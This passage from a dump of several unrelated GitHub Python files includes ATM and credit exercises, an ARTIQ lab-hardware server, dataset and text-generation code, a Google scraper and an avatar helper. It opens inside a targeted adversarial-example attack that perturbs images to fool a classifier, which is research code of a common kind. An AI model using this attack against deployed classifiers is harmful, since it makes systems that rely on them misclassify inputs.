self.cls_criterion = nn.CrossEntropyLoss()\n\n    def __call__(self, x, y, target_y):\n        with tqdm(range(self.attack_iter)) as loader:\n            for i in loader:\n                x.requires_grad_(True)\n                pred = self.model(x)\n                attack_loss = self.cls_criterion(pred, target_y)\n                benign_loss = self.cls_criterion(pred, y)\n                attack_loss.backward(retain_graph=True)\n                attack_grad = x.grad.clone()\n                x.grad.data.zero_()\n                benign_loss.backward(retain_graph=True)\n                benign_grad = x.grad.clone() * self.benign_weight\n                x.grad.data.zero_()\n                prob = nn.functional.softmax(pred, dim=1)\n                gt_prob = prob[[i for i in range(x.size(0))], y]\n                gt_prob.mean().backward()\n                saliency = x.grad.clone().abs()\n                x.grad.data.zero_()\n                benign_mask = []\n                for j, s in enumerate(saliency):\n                    s = s.contiguous().view(-1).sort(descending=True)[0]\n                    threshold = s[int(self.benign_ratio * s.size(0))]\n                    benign_mask.append(saliency[j] >= threshold)\n                benign_mask = torch.cat([m.float().unsqueeze(0) for m in benign_mask], dim=0)\n                x = x.clone().detach()\n                attack_grad = torch.clamp(attack_grad, -self.clip_grad, self.clip_grad)\n                benign_grad = torch.clamp(benign_grad, -self.clip_grad, self.clip_grad)\n                x -= self.attack_lr * (attack_grad * (1 - benign_mask) + benign_grad * benign_mask)\n                pred = self.model(x).argmax(dim=1)\n                print(pred, target_y)\n        return x, (pred == target_y).int().detach()\n\n    def to(self, device):\n        self.model.to(device)\n\n","repo_name":"zcc31415926/P-ALPhA","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29304176139","text":"def cajero():\n    saldo_cuenta = 100000\n    saldo_cajero = 1000000\n    intentos = 0\n\n    while True:\n        usuario = input(\"Ingrese su usuario: \")\n        clave = input(\"Ingrese su clave: \")\n\n        if usuario == \"10334151\" and clave == \"1803\":\n            intentos = 0\n            print(\"Acceso permitido\\n\")\n\n            while True:\n                monto_retiro = int(input(\"Ingrese el monto a retirar: \"))\n\n                if monto_retiro > saldo_cuenta:\n                    print(\"Monto no permitido. El saldo de su cuenta es insuficiente.\\n\")\n                elif monto_retiro > saldo_cajero:\n                    print(\"Monto no permitido. El cajero no cuenta con suficiente dinero.\\n\")\n                else:\n                    saldo_cuenta -= monto_retiro\n                    saldo_cajero -= monto_retiro\n                    print(\"Retiro exitoso.\")\n                    print(\"Saldo cuenta:\", saldo_cuenta)\n                    print(\"Saldo cajero:\", saldo_cajero, \"\\n\")\n        else:\n            intentos += 1\n            print(\"Clave inválida. Intento:\", intentos, \"\\n\")\n\n            if intentos == 3:\n                print(\"Tarjeta bloqueada. 
Ha excedido el número máximo de intentos.\")\n break\n\n opcion = input(\"¿Desea realizar otra transacción? (N para salir): \")\n if opcion.upper() == \"N\":\n break\n\ncajero()\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej10/hito1_ej10_dabda03af113312de1c61fc9a2428a1d.py","file_name":"hito1_ej10_dabda03af113312de1c61fc9a2428a1d.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3547251239","text":"from lichee.dataset.io_reader.io_reader_base import BaseIOReader, TFRecordReader\nfrom lichee.utils import common\nfrom lichee.utils.tfrecord.reader import read_single_record_with_spec_index\nfrom lichee.utils.tfrecord import tfrecord_loader\nfrom lichee.utils.tfrecord.tools import create_index\nimport concurrent.futures\nfrom abc import ABCMeta\nfrom concurrent.futures import as_completed\nfrom typing import List\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\nfrom transformers import AutoTokenizer\nimport warnings\nfrom sklearn.metrics import f1_score\nfrom lichee.utils.tfrecord import example_pb2\nfrom lichee.utils.tfrecord.reader import tfrecord_iterator\nimport pandas as pd\nwarnings.filterwarnings(\"ignore\")\n\n\nclass BaseDataset(Dataset):\n def __init__(self, df_path, data_path,text_type='title'):\n self.df_path = df_path\n\n self.text_type = text_type\n self.data_path = data_path\n\n def __len__(self):\n return len(self.df_path)\n\n def __getitem__(self,index):\n datas = self.df_path.iloc[index, 0].split('\\t')\n vid_1 = datas[0]\n vid_2 = datas[1]\n label = float(datas[2])\n \n v_content_1 = self.read_record(vid_1)\n v_content_2 = self.read_record(vid_2)\n return (vid_1, v_content_1), (vid_2, v_content_2), label\n\n def read_record(self, target):\n frame_path = self.data_path + 'frame_feature/' + target + '.npy'\n title_path = self.data_path + 'title/' + target + '.txt'\n asr_text_path = self.data_path + 'asr_text/' + target + '.txt'\n frame_feature = self.frame_process(frame_path)\n if self.text_type == 'asr_text':\n text = self.text_tokenizer(asr_text_path)\n elif self.text_type == 'title':\n text = self.text_tokenizer(title_path)\n elif self.text_type == 'com_text':\n text = self.text_tokenizer(title_path, asr_text_path, max_length=64)\n return frame_feature, text\n \n def frame_process(self, frames_path, num_segments=32):\n frame_feature = np.load(frames_path)\n zero_frame = frame_feature[0] * 0.\n num_frames = frame_feature.shape[0]\n dim = frame_feature.shape[1]\n\n if num_frames <= num_segments:\n padding_length = num_segments - num_frames\n fillarray = np.zeros((padding_length, dim))\n res = np.concatenate((frame_feature, fillarray), axis=0)\n mask = [1] * (num_frames+1) + ([0] * padding_length)\n else:\n # keep the first num_segments frames: slice along the frame axis (dim 0), not the feature axis\n res = frame_feature[:num_segments]\n mask = [1] * (num_segments+1)\n return torch.tensor(np.c_[res], dtype=torch.float32), torch.tensor(mask)\n\n def text_tokenizer(self,text_1_path, text_2_path=None,max_length=50):\n text_2 = None\n with open(text_1_path, \"r\") as f: \n text_1 = f.read()\n if text_2_path is not None:\n with open(text_2_path, \"r\") as f: \n text_2 = f.read()\n return self.text_tokenizer_2(text_1, text_2, max_length)\n\n def text_tokenizer_2(self,text,text_2=None, max_length=50):\n Tokenizer = AutoTokenizer.from_pretrained('data/bert_base')\n PAD, CLS, SEP = '[PAD]', '[CLS]', '[SEP]'\n token = 
Tokenizer.tokenize(text)\n token_1 = [CLS] + token + [SEP]\n seq_len = len(token)\n mask = []\n token_2 = []\n token = token_1\n if text_2 is not None:\n token_2 = Tokenizer.tokenize(text_2)\n token = token_1 + token_2\n token_ids = Tokenizer.convert_tokens_to_ids(token)\n if len(token) < max_length:\n mask = [1] * len(token_ids) + [0] * (max_length - len(token))\n token_ids += ([0] * (max_length - len(token)))\n token_type_ids = [0]*len(token_1) + [1]*len(token_2) + [0]*(max_length - len(token))\n else:\n mask = [1] * max_length\n token_ids = token_ids[:max_length]\n token_type_ids = [0]*len(token_1) + [1]*len(token_2)\n token_type_ids = token_type_ids[:max_length]\n return torch.LongTensor(token_ids), torch.LongTensor(token_type_ids), torch.LongTensor(mask)\n\n\n","repo_name":"chenjiashuo123/AIAC-2021-Task1-Rank17","sub_path":"util/dataset_pair_cls_mask.py","file_name":"dataset_pair_cls_mask.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"43217657638","text":"import os\nfrom labrad.server import LabradServer, setting, Signal\nfrom labrad import types as T\nfrom twisted.internet.defer import returnValue, inlineCallbacks\nfrom labrad.support import getNodeName\nfrom artiq_api import ARTIQ_api\n\n\nTTLSIGNAL_ID = 828176\nDACSIGNAL_ID = 828175\nDDSSIGNAL_ID = 828172\n\nDDB_FILEPATH = 'C:\\\\Users\\\\barium133\\\\Code\\\\barium\\\\lib\\\\servers\\\\Artiq\\\\device_db.py'\n\nclass Artiq_Server(LabradServer):\n\n name = 'Artiq Server'\n\n ddsChanged = Signal(DDSSIGNAL_ID, 'signal: dds changed', '(ssv)')\n ttlChanged = Signal(TTLSIGNAL_ID, 'signal: ttl changed', '(sb)')\n dacChanged = Signal(DACSIGNAL_ID, 'signal: dac changed', '(ssv)')\n\n @inlineCallbacks\n def initServer(self):\n self.api = ARTIQ_api(DDB_FILEPATH)\n\n #initialize DAC required if device restarted\n yield self.api.initializeDAC()\n yield self.set_Devices()\n #self.setup()\n\n def set_Devices(self):\n \"\"\"\n Get the list of devices in the ARTIQ box.\n \"\"\"\n dds_tmp = list(self.api.dds_list.values())[0]\n self.ca = dds_tmp.amplitude_to_asf(1.0)\n self.fa = dds_tmp.frequency_to_ftw(1.0)*1e6\n self.dac_vals = [0]*32\n self.dac_state = [False]*32\n self.TTL_state = [False]*24\n self.dds_params = {}\n self.ttlout_list = list(self.api.ttlout_list.keys())\n self.ttlin_list = list(self.api.ttlin_list.keys())\n self.dds_list = list(self.api.dds_list.keys())\n for key in self.dds_list:\n self.dds_params[key] = [100.0,0.0,False,31.5]\n\n @inlineCallbacks\n def setup(self):\n for i in range(4,24):\n yield self.api.setTTL('ttl'+str(i),False)\n for i in range(32):\n yield self.api.setZotino(i, float(0.0))\n \n # CORE\n @setting(21, returns='*s')\n def get_Devices(self, c):\n \"\"\"\n Returns a list of ARTIQ devices.\n \"\"\"\n return list(self.api.device_db.keys())\n\n @setting(31, dataset_name='s', returns='?')\n def get_Dataset(self, c, dataset_name):\n \"\"\"\n Returns a dataset.\n Arguments:\n dataset_name (str) : the name of the dataset\n Returns:\n the dataset\n \"\"\"\n return self.datasets.get(dataset_name, archive=False)\n\n\n @setting(421, dac_num='i', value='v', units='s', returns='')\n def set_dac(self, c, dac_num, value, units='mu'):\n \"\"\"\n Manually set the voltage of a DAC channel.\n Arguments:\n dac_num (int) : the DAC channel number\n value (float) : the value to write to the DAC register\n units (str) : the voltage units, either 'mu' or 'v'\n \"\"\"\n voltage_max = 10.0\n # check that dac channel is valid\n if 
(dac_num > 31) or (dac_num < 0):\n raise Exception('Error: device does not exist.')\n # check that units and voltage are valid\n if value > voltage_max or value < -voltage_max:\n raise Exception('Error: voltage out of range')\n\n\n self.dac_vals[dac_num] = float(value)\n if self.dac_state[dac_num]:\n yield self.api.setZotino(dac_num, float(value))\n\n\n @setting(431, dac_num='i', returns='i')\n def read_dac(self, c, dac_num):\n \"\"\"\n Read the value of a DAC register.\n Arguments:\n dac_num (int) : the dac channel number\n \"\"\"\n if (dac_num > 31) or (dac_num < 0):\n raise Exception('Error: device does not exist.')\n\n reg_val = yield self.api.readZotino(dac_num)\n\n returnValue(reg_val)\n\n @setting(441, dac_num = 'i', returns = 'v')\n def get_dac_val(self, c, dac_num):\n return(self.dac_vals[dac_num])\n\n @setting(451, dac_num = 'i', state = 'b', returns = '')\n def set_dac_state(self, c, dac_num, state):\n if state:\n self.dac_state[dac_num] = True\n yield self.api.setZotino(dac_num, self.dac_vals[dac_num])\n else:\n self.dac_state[dac_num] = False\n yield self.api.setZotino(dac_num, float(0.0))\n\n @setting(461, dac_num = 'i', returns = 'b')\n def get_dac_state(self, c, dac_num):\n return(self.dac_state[dac_num])\n\n # TTL\n @setting(211, returns='*s')\n def list_ttl(self, c):\n \"\"\"\n Lists all available TTL channels.\n Returns:\n (*str) : a list of all TTL channels.\n \"\"\"\n return self.ttlout_list + self.ttlin_list\n\n @setting(221, ttl_name='i', state=['b', 'i'], returns='')\n def set_ttl(self, c, ttl_name, state):\n \"\"\"\n Manually set a TTL to the given state. TTL can be of classes TTLOut or TTLInOut.\n Arguments:\n ttl_name (int) : the ttl channel number\n state [bool, int] : ttl power state\n \"\"\"\n if 'ttl'+ str(ttl_name) not in self.ttlout_list:\n raise Exception('Error: device does not exist.')\n if (type(state) == int) and (state not in (0, 1)):\n raise Exception('Error: invalid state.')\n self.TTL_state[ttl_name] = state\n yield self.api.setTTL('ttl'+ str(ttl_name), state)\n self.ttlChanged(('ttl'+ str(ttl_name), state))\n\n\n @setting(222, ttl_name='i', returns='b')\n def get_ttl(self, c, ttl_name):\n \"\"\"\n Read the power state of a TTL. 
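A minimal client-side sketch (hypothetical, not from this file; it assumes a LabRAD connection object named cxn): state = yield cxn.artiq_server.get_ttl(4). 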
TTL must be of class TTLInOut.\n Arguments:\n ttl_name (int) : the ttl channel number\n Returns:\n (bool) : ttl power state\n \"\"\"\n if 'ttl'+ str(ttl_name) not in self.ttlin_list:\n raise Exception('Error: device does not exist.')\n state = yield self.api.getTTL('ttl'+ str(ttl_name))\n returnValue(bool(state))\n\n @setting(223, TTL_num = 'i', returns = 'b')\n def get_ttl_state(self, c, TTL_num):\n return(self.TTL_state[TTL_num])\n\n\n # DDS\n @setting(311, returns='*s')\n def list_dds(self, c):\n \"\"\"\n Get the list of available DDS channels.\n Returns:\n (*str) : the list of dds names\n \"\"\"\n dds_list = yield self.api.dds_list.keys()\n #dds_list = yield self.api.urukul_list.keys()\n returnValue(list(dds_list))\n\n @setting(301, returns='*s')\n def list_urukul(self, c):\n \"\"\"\n Get the list of available Urukul boards.\n Returns:\n (*str) : the list of urukul names\n \"\"\"\n ur_list = yield self.api.urukul_list.keys()\n #dds_list = yield self.api.urukul_list.keys()\n returnValue(list(ur_list))\n\n @setting(321, dds_name='s', returns='')\n def initialize_dds(self, c, dds_name):\n \"\"\"\n Resets/initializes the DDSs.\n Arguments:\n dds_name (str) : the name of the dds\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n yield self.api.initializeDDS(dds_name)\n\n \n @setting(323, dds_name='s', freq='v', returns='')\n def set_dds_freq(self, c, dds_name, freq):\n \"\"\"\n Manually set the frequency of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n freq (float) : the frequency in MHz\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if freq > 500 or freq < 0:\n raise Exception('Error: frequency must be within [0 MHz, 500 MHz].')\n amp = self.dds_params[dds_name][1]\n self.dds_params[dds_name][0] = float(freq)\n yield self.api.setDDS(dds_name, float(freq), float(amp))\n self.ddsChanged((dds_name, 'freq', float(freq)))\n\n @setting(324, dds_name='s', amp='v', returns='')\n def set_dds_amp(self, c, dds_name, amp):\n \"\"\"\n Manually set the amplitude of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n amp (float) : the fractional amplitude\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if amp > 1 or amp < 0:\n raise Exception('Error: amplitude must be within [0, 1].')\n freq = self.dds_params[dds_name][0]\n self.dds_params[dds_name][1] = float(amp)\n yield self.api.setDDS(dds_name, float(freq), float(amp))\n self.ddsChanged((dds_name, 'amp', float(amp)))\n\n @setting(334, dds_name='s', att='v', returns='')\n def set_dds_att(self, c, dds_name, att):\n \"\"\"\n Manually set the attenuation of a DDS channel.\n Arguments:\n dds_name (str) : the name of the dds\n att (float) : the attenuation in dB\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if att > 31.5 or att < 0:\n raise Exception('Error: attenuation must be within [0, 31.5].')\n self.dds_params[dds_name][3] = float(att)\n yield self.api.setDDSatt(dds_name, float(att))\n self.ddsChanged((dds_name, 'att', float(att)))\n \n\n @setting(322, dds_name='s', state=['b', 'i'], returns='')\n def toggle_dds(self, c, dds_name, state):\n \"\"\"\n Manually toggle a DDS via the RF switch\n Arguments:\n dds_name (str) : the name of the dds\n state [bool, int] : power state\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n if (type(state) == int) and (state not in (0, 1)):\n raise 
Exception('Error: invalid state.')\n self.dds_params[dds_name][2] = state\n yield self.api.toggleDDS(dds_name, state)\n \n @setting(331, dds_name='s', returns='s')\n def readDDS(self, c, dds_name):\n \"\"\"\n Read back the frequency, fractional amplitude and switch state of a DDS.\n Arguments:\n dds_name (str) : the name of the dds\n Returns:\n (str) : the frequency, fractional amplitude and switch state\n \"\"\"\n if dds_name not in self.dds_list:\n raise Exception('Error: device does not exist.')\n\n reg_val = yield self.api.getDDS(dds_name)\n returnValue(str(reg_val[0]/float(self.fa)) + ' ' + str(float(reg_val[1])/float(self.ca)) + ' ' + str(reg_val[2]))\n\n\n @setting(351, dds_name = 's', returns = 'v')\n def get_dds_freq(self, c, dds_name):\n return(self.dds_params[dds_name][0])\n \n @setting(361, dds_name = 's', returns = 'v')\n def get_dds_amp(self, c, dds_name):\n return(self.dds_params[dds_name][1])\n\n @setting(371, dds_name = 's', returns = 'b')\n def get_dds_state(self, c, dds_name):\n return(self.dds_params[dds_name][2])\n\n @setting(381, dds_name = 's', returns = 'v')\n def get_dds_att(self, c, dds_name):\n return(self.dds_params[dds_name][3])\n\n @setting(391, dds_name = 's', returns = 'v')\n def read_dds_att(self, c, dds_name):\n return self.api.getDDSatt(dds_name)\n \nif __name__ == \"__main__\":\n from labrad import util\n util.runServer(Artiq_Server())\n","repo_name":"zjwall/Barium2","sub_path":"barium/lib/servers/Artiq/artiq_server.py","file_name":"artiq_server.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29275597530","text":"import tensorflow as tf\nfrom tensorflow import data\nfrom tensorflow import TensorShape\nfrom keras import Sequential\nfrom keras.layers import Embedding, GRU, Dense\n\nimport numpy as np\n\ntext = open('example.txt', 'rb').read().decode(encoding='utf-8')\n\nvocab = sorted(set(text))\n# print(len(vocab))\n\nchar2idx = {unique: idx for idx, unique in enumerate(vocab)}\nidx2char = np.array(vocab)\n\ntext_as_int = np.array([char2idx[char] for char in text])\n\nseq_length = 100\n\nchar_dataset = data.Dataset.from_tensor_slices(text_as_int)\n\nsequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\ndef split_input_target(chunk):\n input_text = chunk[:-1]\n target_text = chunk[1:]\n return input_text, target_text\n\ndataset = sequences.map(split_input_target)\n\nbatch_size = 64\nbuffer_size = 35162\n\nds = dataset.shuffle(buffer_size).batch(batch_size, drop_remainder=True)\n\nvocab_size = len(vocab)\nembedding_dim = 256\nrnn_units = 1024\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n return Sequential(\n [\n Embedding(\n vocab_size,\n embedding_dim,\n batch_input_shape=[batch_size, None],\n ),\n GRU(\n rnn_units,\n return_sequences=True,\n stateful=True,\n recurrent_initializer='glorot_uniform',\n ),\n Dense(vocab_size),\n ]\n )\n\ncheckpoint_dir = 'training_checkpoints'\n\nmodel = build_model(vocab_size, embedding_dim, rnn_units, batch_size=1)\n\nmodel.load_weights(tf.train.latest_checkpoint(checkpoint_dir)).expect_partial()\n\nmodel.build(TensorShape([1, None]))\n\n# Some info of model\n# model.summary()\ntext_generated = []\n\ndef generation_text(model, start_string):\n num_generations = 300\n input_eval = [char2idx[s] for s in start_string]\n input_eval = tf.expand_dims(input_eval, 0)\n\n temperature = 0.5\n max_length = 142\n power = 1\n model.reset_states()\n for _ in 
range(num_generations):\n predictions = model(input_eval)\n predictions = tf.squeeze(predictions, 0)\n\n predictions = predictions / temperature\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1, 0].numpy()\n\n input_eval = tf.expand_dims([predicted_id], 0)\n text_generated.append(idx2char[predicted_id])\n\n if \" \" in text_generated and (max_length*power-10) < len(text_generated) < (max_length*power+10):\n text_generated.append(\"\\n\")\n power += 1\n\n return (start_string + ''.join(text_generated) + \".\")\n\nstart_string = input(\"Start string: \")\n# #Generating text\nprint(generation_text(model, start_string=start_string))\n","repo_name":"W00JTAS/AI-generator_testu","sub_path":"text_generator.py","file_name":"text_generator.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43496086090","text":"\r\nreadMe = open(\"numere.txt\", 'r')\r\nvariabil = [int(x) for x in readMe.readline().split()]\r\n\r\n\r\ndef min_max(*variabil):\r\n if not variabil:\r\n return None\r\n mini = maxi = variabil[0]\r\n for elem in variabil:\r\n if elem > maxi:\r\n maxi = elem\r\n elif elem < mini:\r\n mini = elem\r\n return mini, maxi\r\n\r\n# despachetam lista, altfel min_max primeste un singur argument (lista intreaga)\r\nprint(min_max(*variabil))\r\n\r\n\r\n\r\n\r\n# 3. (Tratarea excepțiilor)\r\n# a) Să se scrie o funcție “min_max” care primește un număr variabil de parametri (numere\r\n# naturale) și returnează cel mai mic și cel mai mare număr dintre cele primite ca parametri, dacă\r\n# există cel puțin un parametru și dacă toți parametrii sunt numere naturale, sau returnează None\r\n# altfel.\r\n# b) Să se citească tot conținutul fișierului text “numere.txt” și apoi să se afișeze pe ecran rezultatele\r\n# obținute aplicând funcția “min_max” asupra sa. Dacă valoarea returnată de funcția min_max este\r\n# diferită de None, se va scrie în fișierul text “impartire.txt” rezultatul împărțirii valorii maxime din\r\n# fișierul text la cea minimă. Să se trateze excepțiile care pot să apară: nu există fișierul text de\r\n# intrare, nu există drept de scriere pentru fișierul de ieșire, fișierul de intrare conține valori care nu\r\n# sunt numere naturale, împărțire la zero etc.\r\n# Exemplu: Dacă fișierul text “numere.txt” conține: 11 9 31 7 145 5 101 4 80, atunci funcția\r\n# “min_max” va returna (4, 145), iar în fișierul “impartire.txt” se va scrie: 36.25","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-I/Sem-I/AF/Laborator/Coded/Lab4/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17652177402","text":"\"\"\"\nModulo para Algoritmo Genetico\n\"\"\"\n# -*- coding: utf-8 -*-\n\nfrom random import randint, random\nfrom operator import add\n\ndef individuo(tamanho, min, max):\n 'Cria um membro da populacao.'\n return [randint(min,max) for x in xrange(tamanho)]\n\ndef population(n_individuos, tamanho, min, max):\n \"\"\"\n Cria um numero de individuos\n\n n_individuos: numero de individuos na populacao\n tamanho: numero de valores por individuo\n min: valor minimo possivel de cada gene\n max: valor maximo possivel de cada gene\n\n \"\"\"\n return [individuo(tamanho, min, max) for x in xrange(n_individuos) ]\n\ndef fitness(individuo, objetivo):\n \"\"\"\n Determina o fitness de um individuo. 
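Exemplo ilustrativo: fitness([50, 50], 100) devolve abs(100 - (50 + 50)) = 0, enquanto fitness([10, 20], 100) devolve 70. 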
Quanto menor melhor.\n\n individuo: lista de genes do individuo\n objetivo: valor alvo da soma dos genes\n \"\"\"\n sum = reduce(add, individuo, 0)\n return abs(objetivo-sum)\n\ndef grade(populacao, objetivo):\n 'Encontra o fitness medio da populacao'\n\n summed = reduce(add, (fitness(x, objetivo) for x in populacao))\n return summed / (len(populacao) * 1.0)\n\ndef evolve(pop, target, retain=0.2, random_select=0.05, mutate=0.01):\n graded = [(fitness(x, target), x) for x in pop]\n graded = [x[1] for x in sorted(graded)]\n retain_length = int(len(graded)*retain)\n parents = graded[:retain_length]\n\n # adiciona individuos aleatoriamente para promover diversidade genetica\n\n for individual in graded[retain_length:]:\n if random_select > random():\n parents.append(individual)\n # faz mutacao de alguns individuos\n for individual in parents:\n if mutate > random():\n pos_to_mutate = randint(0, len(individual)-1)\n individual[pos_to_mutate] = randint(\n min(individual), max(individual))\n\n # crossover dos pais\n parents_length = len(parents)\n desired_length = len(pop) - parents_length\n children = []\n while len(children) < desired_length:\n male = randint(0, parents_length-1)\n female = randint(0, parents_length-1)\n if male != female:\n male = parents[male]\n female = parents[female]\n half = len(male) / 2\n child = male[:half] + female[half:]\n children.append(child)\n parents.extend(children)\n return parents","repo_name":"imperiumzigna/alg_gen_trab","sub_path":"alggen/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20443770630","text":"import datetime\nfrom urllib.parse import quote\n\nimport chromedriver_binary\nfrom selenium import webdriver\n\n\ndef getDriver():\n chromeOptions = webdriver.ChromeOptions()\n chromeOptions.add_argument('--headless')\n chromeOptions.add_argument('--disable-gpu')\n chromeOptions.add_argument('--no-sandbox')\n driver = webdriver.Chrome(options=chromeOptions)\n driver.implicitly_wait(10)\n return driver\n\n\ndef crawl(driver, css, results):\n title_tags = driver.find_elements_by_css_selector(\"h3\")[:-1]\n a_tags = driver.find_elements_by_xpath(\"//a[h3]\")\n\n links = []\n titles = []\n for a_tag, title_tag in zip(a_tags, title_tags):\n links.append(a_tag.get_attribute(\"href\"))\n titles.append(title_tag.text)\n\n for link, title in zip(links, titles):\n result = [title, link]\n try:\n driver.get(link)\n for cs in css:\n try:\n result.append(driver.find_element_by_css_selector(cs).text)\n except:\n result.append(None)\n except:\n pass\n\n print(result)\n results.append(result)\n return results\n\n\ndef getTarget(kw, pages, css):\n driver = getDriver()\n results = []\n for page in range(pages):\n start = \"&start=\" + str(page * 10)\n url = 'https://www.google.com/search?q=' + quote(kw) + start\n driver.get(url)\n results = crawl(driver, css, results)\n\n driver.quit()\n return results\n\n\nif __name__ == '__main__':\n datas = getTarget('松 SEO', 2, ['h1'])\n print(datas)\n","repo_name":"kaiadachi/flask_vue","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29332765459","text":"#Aprobación de créditos\ningreso = int(input(\"ingreso:\"))\nanac = int(input(\"año de nacimiento:\"))\nnhij = int(input(\"numero de hijos:\"))\napertbanco = int(input(\"años de pertenencia al 
banco:\"))\nestado = input(\"Estado civil (S: soltero, C: casado)\")\nlugar = input(\"Si vive en campo o ciudad (U: urbano, R: rural)\")\n\nif apertbanco > 10 or nhij > 2:\n print(\"APROBADO\")\nelif estado == 'C' or nhij > 3 or (2020 - 55 <= anac <= 2020 - 45):\n print(\"APROBADO\")\nelif ingreso > 2500000 or estado == 'S' and lugar == 'U':\n print(\"APROBADO\")\nelif ingreso > 3500000 and apertbanco > 5:\n print(\"APROBADO\")\nelif lugar == 'R' or estado == 'C' and nhij < 2:\n print(\"APROBADO\")\nelse:\n print(\"REPROBADO\") ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_fafc029ad5f98b71ffb959c5470dc6e0.py","file_name":"hito1_ej3_fafc029ad5f98b71ffb959c5470dc6e0.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17060068122","text":"import os\nimport urllib.parse\n\nimport cairosvg\n\nfrom django.core.cache import cache\nfrom django.template import loader, Context\nfrom django.conf import settings\n\nfrom sorl.thumbnail import get_thumbnail\n\nfrom . import colors as col\nfrom .full_url import get_full_url\n\n\nAVATAR_SIZE_MIN = getattr(settings, 'AVATAR_SIZE_MIN', 20)\nAVATAR_SIZE_MAX = getattr(settings, 'AVATAR_SIZE_MAX', 200)\nAVATAR_SIZE_DEFAULT = getattr(settings, 'AVATAR_SIZE_DEFAULT', 120)\nAVATARS_URL = getattr(settings, 'AVATARS_URL', 'avatars')\nAVATAR_MAX_FILESIZE = getattr(settings, 'AVATAR_MAX_FILESIZE', 1 * 1024 * 1024) # 1 MB\n\nAVATARS_PATH = str(os.path.join(settings.MEDIA_URL, AVATARS_URL))\nAVATARS_ABS_PATH = str(os.path.join(settings.MEDIA_ROOT, AVATARS_URL))\n\nif not os.path.exists(AVATARS_ABS_PATH):\n os.makedirs(AVATARS_ABS_PATH)\n\n\ndef get_avatar(request, user, size=None, bg_shade=0):\n\n if size is None:\n size = AVATAR_SIZE_DEFAULT\n else:\n size = int(size)\n # fall back to the default when the requested size is out of range\n if size < AVATAR_SIZE_MIN or size > AVATAR_SIZE_MAX:\n size = AVATAR_SIZE_DEFAULT\n\n # use user-defined avatar\n if user.avatar:\n img = get_thumbnail(user.avatar.file, '%dx%d' % (size, size), crop='center', quality=90)\n return get_full_url(request, img.url)\n\n # use cached gravatar\n filename = cache_key = '{pk:08d}-{size:03d}-{bg:03d}.png'.format(\n size=size,\n pk=user.pk,\n bg=int(bg_shade * 100)\n )\n\n path = cache.get(cache_key)\n\n if not path:\n abs_path = os.path.join(AVATARS_ABS_PATH, filename)\n path = os.path.join(AVATARS_PATH, filename)\n\n if not os.path.isfile(abs_path):\n color = col.from_hex(user.hash[:6])\n\n template = loader.get_template('pickers/avatar.html')\n\n icon = template.render(Context({\n 'size': size,\n 'bg': color.complementary().shade(bg_shade).hexcode() if bg_shade else 0,\n 'color': color.hexcode(),\n }))\n\n with open(abs_path, 'wb') as f:\n f.write(cairosvg.svg2png(bytestring=icon))\n\n cache.set(cache_key, path)\n\n return 'https://secure.gravatar.com/avatar/{hash}?{params}'.format(\n hash=user.hash,\n params=urllib.parse.urlencode({\n 'd': get_full_url(request, path),\n 's': str(size),\n }),\n )\n","repo_name":"amir17688/google_data_p2","sub_path":"79144_avatar.py_C__Users_user_Desktop_data_2_data_google_data_jsmesami_naovoce_src_utils.py","file_name":"79144_avatar.py_C__Users_user_Desktop_data_2_data_google_data_jsmesami_naovoce_src_utils.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26402981429","text":"import os\nimport glob\nimport whitebox\nimport argparse\nimport shutil\nimport geopandas as gpd\nfrom osgeo import 
